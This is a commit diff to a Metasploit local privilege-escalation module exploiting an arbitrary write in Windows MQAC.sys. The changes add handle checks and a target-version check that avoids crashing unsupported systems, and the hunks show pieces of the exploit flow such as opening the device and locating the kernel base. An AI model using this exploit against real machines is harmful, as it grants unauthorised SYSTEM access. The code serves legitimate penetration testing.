Add some small fixes to the MQAC local exploit

* Check for `INVALID_HANDLE_VALUE` when attempting to open the
  device, as this is what is returned when the device doesn't exist.
* Make sure that we only run the exploit against tartgets that we
  support directly to make sure we don't BSOD machines (such as what
  happens with SP1/SP2).
* Add a call to `check` in the exploit code.

Author: OJ

modules/exploits/windows/local/mqac_write.rb

@@ -12,6 +12,8 @@ class Metasploit3 < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
+  INVALID_HANDLE_VALUE = 0xFFFFFFFF
+
   def initialize(info={})
     super(update_info(info, {
       'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
@@ -107,7 +109,7 @@ def open_device
 
   def check
     handle = open_device
-    if handle.nil?
+    if handle.nil? || handle == INVALID_HANDLE_VALUE
       return Exploit::CheckCode::Safe
     end
     session.railgun.kernel32.CloseHandle(handle)
@@ -137,12 +139,19 @@ def exploit
       return
     end
 
+    # Running on Windows XP versions that aren't listed in the supported list results
+    # in a BSOD and so we should not let that happen.
+    if check != Exploit::CheckCode::Appears
+      print_error("Target machine not supported (incorrect Windows version or missing MSMQ)")
+      return
+    end
+
     kernel_info = find_sys_base(nil)
     base_addr = 0xffff
     print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
 
     handle = open_device
-    return if handle.nil?
+    return if handle.nil? || handle == INVALID_HANDLE_VALUE
 
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)